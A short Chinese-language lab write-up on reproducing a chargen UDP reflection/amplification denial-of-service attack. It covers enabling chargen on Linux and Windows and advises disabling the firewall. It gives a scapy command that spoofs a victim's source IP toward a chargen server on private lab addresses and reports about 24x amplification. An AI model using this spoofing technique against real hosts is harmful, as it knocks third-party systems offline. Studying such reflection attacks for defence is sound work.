chargen 拒绝服务攻击复现

chargen 拒绝服务攻击复现

什么是chargen?

字符生成器协议，是RFC864中定义的网络服务。用于测试，调试，测量目的。可以使用tcp或udP连接，服务端口通常为19，会返回随机数量的随机字符。

启用chargen

• linux开启chargenundefinedlinux下通过inetd使用，路径为/etc/xinetd.d ,通过编辑chargen-config或chargen-dgram配置文件进行开启。

将disable改成no，protocol选择yes.

然后重启inetd服务，service xinetd restart

• windows开启chargenundefined需用在windows server下开启，归属于simple-tcp/ip服务。 使用powershell进行安装。

Install-WindowsFeature Simple-TCPIP

然后运行services.msc启用该服务即可。

记得关闭防火墙。

协议漏洞

使用nc发送一个请求，返回大量如下字符：

使用chargen进行dros原理正如上图，当往19端口发送一个请求，会返回大量如上数据。

攻击复现

使用python的scapy伪造源ip发送udp数据包：send(IP(src='192.168.216.130',dst='192.168.216.135')/UDP(dport=19,sport=7777))

192.168.216.135为开了chargen的服务器ip，192.168.216.130为受害机ip

在受害机上抓取pcap如下：

放大24倍左右。